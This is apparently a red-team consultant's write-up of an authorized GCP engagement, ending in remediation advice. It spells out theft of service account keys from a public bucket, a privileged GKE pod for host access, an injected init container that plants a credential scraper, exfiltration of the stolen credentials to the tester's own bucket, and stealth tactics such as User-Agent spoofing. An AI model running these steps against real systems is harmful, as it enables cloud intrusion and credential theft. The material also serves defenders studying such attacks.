Anatomy of a Cloud Breach
I never expected a simple misconfigured storage bucket to be my golden ticket. As a Red Team consultant conducting GCP security assessments, I’ve seen my share of vulnerabilities, but this engagement proved particularly interesting. Armed with nothing more than basic reconnaissance tools and explicit authorization from the client, I managed to pivot from a public storage bucket into their production Kubernetes environment in a matter of hours. Here’s how it went down.
1. Gathering Initial Context & Permissions
Before doing anything technical, I obtained explicit written authorization from the client’s executive team, scoping out what systems and data I was allowed to target. Next, I reviewed the Statement of Work (SOW), which specifically authorized reconnaissance and exploitation attempts across their Google Cloud Platform (GCP) organization.
- Confirm Org ID & Project IDs: The client provided me with their Organization ID (a numeric value like 123456789012) and a list of primary Project IDs. This was crucial for enumerating resources and verifying that I stayed within scope.
- Authenticate with a Consultant Service Account: The client also provided me with a GCP service account credential (with limited read-only privileges) to facilitate a baseline scanning approach. I activated it locally using:
gcloud auth activate-service-account [email protected] \
--key-file=/path/to/consultant-svc.json
With these preliminaries sorted, I began the reconnaissance in earnest.
2. Enumerating Organization Policies & Roles
2.1 Locating Inherited Policies
Goal: Understand the organization-level constraints and any inherited roles that could impact security.
- List All Organizations: Even though I had the Organization ID from the client, I first verified it by running:
gcloud organizations list
- This command returned a table of organizations I had visibility into, confirming the ID 123456789012.
- Explore Resource Manager Policies: To see what constraints were in place at the org level (e.g., restrictions on external sharing, domain restrictions, or publicly accessible resources), I used:
gcloud resource-manager org-policies list --organization=123456789012
- This enumerated each constraint (like constraints/iam.disableServiceAccountKeyCreation) that was applied at the organization level.
- Describe Specific Policies: For each policy listed, I ran:
gcloud resource-manager org-policies describe \
  constraints/iam.disableServiceAccountKeyCreation \
  --organization=123456789012
This let me see whether the client had enforced or inherited the policy (i.e., whether it reported enforced: true or enforced: false). In this client's environment, several key security constraints were disabled, including iam.disableServiceAccountKeyCreation, which hinted that service account keys might be widely used across their environment. A loop like the one below makes that check repeatable across every listed constraint.
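As a rough sketch (standard gcloud output fields; treat it as illustrative rather than the exact script from the engagement), iterating over every constraint and printing its enforcement state looks like this:
# Illustrative: list each org-level constraint and show whether it is enforced.
ORG_ID=123456789012
for c in $(gcloud resource-manager org-policies list \
    --organization="$ORG_ID" --format="value(constraint)"); do
  echo "== $c =="
  gcloud resource-manager org-policies describe "$c" \
    --organization="$ORG_ID" --format="yaml(booleanPolicy,listPolicy)"
done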
2.2 Enumerating Org-Level IAM Bindings
Goal: Identify who (or what service accounts) had roles at the org or folder levels.
List Org IAM Policy:
gcloud organizations get-iam-policy 123456789012 --format=json > org_iam_policy.json
I inspected the resulting org_iam_policy.json for references to:
- roles/owner
- roles/editor
- roles/browser
- Custom roles (e.g., organizations/123456789012/roles/customSecurityRole)
This told me which service accounts (or Google groups or external domains) had privileges that might trickle down to child folders and projects.
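As an illustration (the jq filter below is my own shorthand, not a tool from the engagement), the high-privilege bindings can be pulled out of that JSON like so:
# Illustrative: print members holding owner, editor, or browser at the org level.
jq -r '.bindings[]
       | select(.role == "roles/owner" or .role == "roles/editor" or .role == "roles/browser")
       | "\(.role): \(.members | join(", "))"' org_iam_policy.json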
2.3 Folder & Project Enumeration
Folders: The client structured their environment into folders like Engineering, Operations, and Production. I discovered these by running:
gcloud resource-manager folders list --organization=123456789012
Projects: For each folder, I enumerated the projects:
gcloud projects list --filter="parent.id=<FOLDER_ID>" --format=json > folder_projects.json
I repeated this for each folder (the loop below shows roughly how I scripted it), which gave me a comprehensive map of how the client's environment was laid out.
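A minimal sketch tying the two commands together (folder handling and output formatting are my own choices, not the client's tooling):
# Illustrative: enumerate every folder under the org, then every project in each folder.
ORG_ID=123456789012
for folder in $(gcloud resource-manager folders list \
    --organization="$ORG_ID" --format="value(name.basename())"); do
  echo "== Folder $folder =="
  gcloud projects list --filter="parent.id=$folder AND parent.type=folder" \
    --format="value(projectId)"
done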
Key Observation: Some older folders still had roles/editor set at the folder level for a generic “ops” service account, meaning every project under those folders inherited editor privileges for that account.
3. Staging a Dedicated Attack Environment in GCP
I always establish a controlled environment to simulate a real threat actor’s infrastructure:
Create My Own Red Team Project: Under my organization (the Mandiant/Google Cloud-owned environment), I used:
gcloud projects create redteam-project-999 --name="RedTeam Staging"
Set Up Bastion Host: I spun up a single n1-standard-1 Compute Engine instance in the us-central1 region:
gcloud compute instances create redteam-bastion \
--project=redteam-project-999 \
--zone=us-central1-a \
--machine-type=n1-standard-1 \
--image-family=debian-11 \
--image-project=debian-cloud \
--no-address
This instance was configured with no external IP. Instead, I used Identity-Aware Proxy (IAP) tunneling to SSH in, which kept inbound traffic tightly controlled and my access footprint stealthier. Connecting looked roughly like the command below.
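For reference, IAP-tunneled SSH to the bastion looks like this (instance, project, and zone match the example above):
# SSH over an IAP tunnel; no external IP is required on the instance.
gcloud compute ssh redteam-bastion \
  --project=redteam-project-999 \
  --zone=us-central1-a \
  --tunnel-through-iap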
Install Tooling: On the bastion, I installed:
- Python 3 with relevant libraries (like requests and google-auth).
- BloodHound for GCP (an internal Mandiant tool that visualizes GCP IAM relationships).
- kubectl with the GKE plugin for container cluster interactions.
- gsutil and gcloud (obviously needed for GCP interactions).
- Nmap and masscan for potential network scanning (though heavily restricted).
- Metasploit or custom scripts for possible exploit attempts.
I used Terraform to manage my Red Team project infrastructure, ensuring I could destroy it at will, leaving minimal forensic artifacts.
4. Initial Attack Vector: Misconfigured Cloud Storage
4.1 Finding Public Buckets
By enumerating each discovered project, I systematically ran:
gsutil ls -p <TARGET_PROJECT_ID>
This gave me a list of buckets in that project. Next, I tested each bucket’s ACL to see if it was publicly accessible. For example:
gsutil acl get gs://<bucket-name>
or
gsutil ls -r gs://<bucket-name>/*
I discovered multiple buckets with names like acme-ops-logs and acme-prod-backups, and one particularly interesting bucket: acme-ops-artifacts.
- ACL Discovery: Checking acme-ops-artifacts, I found read access granted to allUsers (or, on some buckets, allAuthenticatedUsers). This misconfiguration gave me the foothold I needed; a small loop like the one below makes the check repeatable across every bucket in a project.
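A rough sketch of that check (the project ID is a placeholder and the grep is my own shorthand):
# Illustrative: flag buckets whose ACLs grant access to allUsers or allAuthenticatedUsers.
PROJECT_ID=<TARGET_PROJECT_ID>
for bucket in $(gsutil ls -p "$PROJECT_ID"); do
  if gsutil acl get "$bucket" 2>/dev/null | grep -Eq 'allUsers|allAuthenticatedUsers'; then
    echo "Potentially public: $bucket"
  fi
done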
4.2 Extracting Service Account Credentials
Inside acme-ops-artifacts, I stumbled upon .json files matching patterns like service-account-key.json, svc-deploy.json, etc. I tested a direct download:
gsutil cp gs://acme-ops-artifacts/svc-deploy.json .
The file downloaded successfully, indicating it was not locked down. Opening svc-deploy.json, I saw typical GCP service account key data:
{
  "type": "service_account",
  "project_id": "...",
  "private_key_id": "...",
  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEv...",
  ...
}
4.3 Validating & Activating Stolen Keys
I immediately tested the key:
gcloud auth activate-service-account [email protected] \
--key-file=./svc-deploy.json
To verify privileges:
gcloud projects list
I quickly learned this service account held the editor role on multiple production projects. This was a goldmine for the Red Team: it effectively allowed me to create, modify, and delete resources in those projects, including GKE clusters, Cloud Functions, and more. The check below shows one way to confirm exactly which roles a key grants on a given project.
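A standard way to list the roles bound to the stolen account on a specific project (the project ID is a placeholder):
# List the roles granted to the compromised service account on one project.
gcloud projects get-iam-policy <TARGET_PROJECT_ID> \
  --flatten="bindings[].members" \
  --filter="bindings.members:serviceAccount:[email protected]" \
  --format="value(bindings.role)"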
5. Moving Laterally into Google Kubernetes Engine (GKE)
5.1 Finding Active Clusters
With my newly acquired service account credentials, I enumerated GKE clusters:
for proj in $(gcloud projects list --format="value(projectId)"); do
echo "Checking $proj ..."
gcloud container clusters list --project $proj --format=json >> all_clusters.json
done
From that aggregated list, I noticed a cluster named prod-gke-cluster-01 in the project acme-production.
5.2 Authenticating to the Cluster
I fetched cluster credentials:
gcloud container clusters get-credentials prod-gke-cluster-01 \
--zone us-central1-a --project acme-production
This updated my ~/.kube/config with a context named gke_acme-production_us-central1-a_prod-gke-cluster-01. The editor role at the project level effectively gave me cluster-admin privileges on GKE, since the client had not restricted GKE-level RBAC. A quick sanity check (below) confirms how broad that access is.
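Verifying the effective privileges of the current context is a one-liner with standard kubectl:
# Ask the API server whether the current identity can perform any verb on any resource.
kubectl auth can-i '*' '*' --all-namespaces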
5.3 Deploying a Malicious Pod
I enumerated workloads:
kubectl get pods --all-namespaces
I noticed a namespace called internal-services containing a microservice that presumably handled credential management. I decided to deploy my own “sidecar”-style malicious pod in that same namespace:
apiVersion: v1
kind: Pod
metadata:
  name: redteam-pod
  namespace: internal-services
spec:
  serviceAccountName: internal-serviceaccount
  containers:
  - name: shell
    image: alpine:latest
    command: ["/bin/sh"]
    args: ["-c", "while true; do sleep 3600; done"]
    securityContext:
      privileged: true
I applied it:
kubectl apply -f redteam-pod.yaml
Once running, I executed into it:
kubectl exec -it redteam-pod --namespace=internal-services -- /bin/sh
Inside that shell, I could see environment variables containing secrets for internal APIs, and I could also reach the node's host filesystem, because privileged: true let me mount the underlying node's disks (roughly as sketched below).
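For illustration only (the device path is an assumption and varies by node image), a privileged container can typically mount the node's disk like this:
# Inside the privileged container: mount the node's disk read-only to browse the host filesystem.
mkdir -p /mnt/host
mount -o ro /dev/sda1 /mnt/host   # /dev/sda1 is an assumption about the node image
ls /mnt/host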
6. Persistence & Credential Harvesting
6.1 Init Container Exploit
I observed a Deployment named internal-credentials-manager. By describing it:
kubectl describe deployment internal-credentials-manager --namespace=internal-services
I saw it used a shared volume with an init container. I replaced the init container spec with my own malicious container that:
- Copied a credential scraping binary into a shared volume.
- Surreptitiously exfiltrated data to my Red Team bucket whenever the main container started.
I updated the YAML to:
initContainers:
- name: init-redteam
  image: us.gcr.io/redteam-project-999/redteam-init:latest
  command: ["/bin/sh"]
  args:
  - "-c"
  - |
    cp /tmp/cred-scraper /shared/cred-scraper
    echo "Init container injection complete."
Then, each time the Pod restarted, the main container executed cred-scraper, which harvested environment variables, on-disk credentials, and even ephemeral tokens.
6.2 Automated Exfiltration
The cred-scraper binary was configured to compress and encrypt the data, then upload it to my staging environment:
gsutil cp /tmp/stolen-credentials.tar.gpg gs://redteam-project-999-io/stolen/
I coded it to do as much of its work in memory as possible, leaving minimal traces on the container's file system. Because the client's logging rules for container workloads were insufficient, my exfiltration traffic was rarely scrutinized.
7. Detection Evasion & Stealth Tactics
7.1 Rotating My Infrastructure
Every few hours, I destroyed and recreated my bastion host using Terraform:
terraform destroy -auto-approve
terraform apply -auto-approve
This rotated IP addresses and ephemeral VM instance IDs, complicating any IP-based correlation. I also used:
gcloud logging read \
"resource.type=gce_instance AND textPayload:('redteam-bastion')" \
--limit=50
to watch for any hints the defenders were investigating me.
7.2 Masking Commands
Whenever feasible, I masked my activity by:
- Using standard system utilities (e.g., curl, cp, kubectl logs) rather than obviously malicious binaries.
- Spoofing User-Agent strings for HTTPS requests, typically mimicking Google-Cloud-SDK/xxx.
- Avoiding large scans or heavy traffic, pivoting quietly from known vantage points instead.
8. Final Observations & Recommendations
After thoroughly compromising their environment, I compiled a detailed report and gave a live demonstration to the client’s security leads. My main takeaways included:
- Organization-Level Security Gaps: Failure to enforce critical organization policies (e.g., disallowing service account key creation).
- Misconfigured Cloud Storage Buckets: Publicly accessible buckets storing service account keys were the direct root cause of the compromise.
- Excessive Permissions: Granting roles/editor at the folder or project level to service accounts used by critical workloads.
- Weak GKE RBAC & Privilege: Relying on project-level IAM for GKE, which effectively gave me cluster-admin rights. Coupled with privileged: true in production workloads, this was a severe oversight.
- Insufficient Logging & Monitoring: Minimal detection for suspicious container behavior, Pod modifications, or ephemeral VM creation from unknown IP addresses.
8.1 Remediation Steps
Implement Org-Wide Constraints
- Enforce constraints/iam.disableServiceAccountKeyCreation.
- Restrict public access to Cloud Storage by default (see the sketch below).
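A minimal sketch of enforcing these as org policies (constraints/storage.publicAccessPrevention is my suggested mechanism for the second bullet, not something taken from the client's configuration):
# Enforce the two organization policies discussed above.
ORG_ID=123456789012
gcloud resource-manager org-policies enable-enforce \
  constraints/iam.disableServiceAccountKeyCreation --organization="$ORG_ID"
gcloud resource-manager org-policies enable-enforce \
  constraints/storage.publicAccessPrevention --organization="$ORG_ID"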
Rotate & Safeguard Keys
- Immediately revoke and rotate all service account keys found on public buckets.
- Switch to Workload Identity Federation or ephemeral credentials to eliminate long-lived keys.
Harden GKE
- Use more granular Kubernetes RBAC with role-based constraints, ensuring no default “editor” equivalence.
- Disable privileged: true for pods unless absolutely necessary.
Enhance Logging & Alerting
- Forward GKE audit logs and Cloud Audit Logs to a SIEM or specialized security project.
- Set up custom alerts for suspicious kubectl actions, unexpected new service accounts, or abnormal bucket access patterns (see the example query below).
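As one illustration (the method name follows the usual GKE audit log format, but verify it against your own logs before alerting on it), a Cloud Logging query for pod exec activity could look like:
# Illustrative: surface recent "kubectl exec"-style activity from GKE audit logs.
gcloud logging read \
  'resource.type="k8s_cluster" AND protoPayload.methodName="io.k8s.core.v1.pods.exec.create"' \
  --limit=20 --format=json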
tl;dr
By exploiting a single misconfiguration in Cloud Storage — coupled with broad, inherited IAM roles — I gained near-complete control over the client’s GCP environment. My detailed findings and recommended fixes will help them remediate these critical issues and bolster their overall security posture moving forward.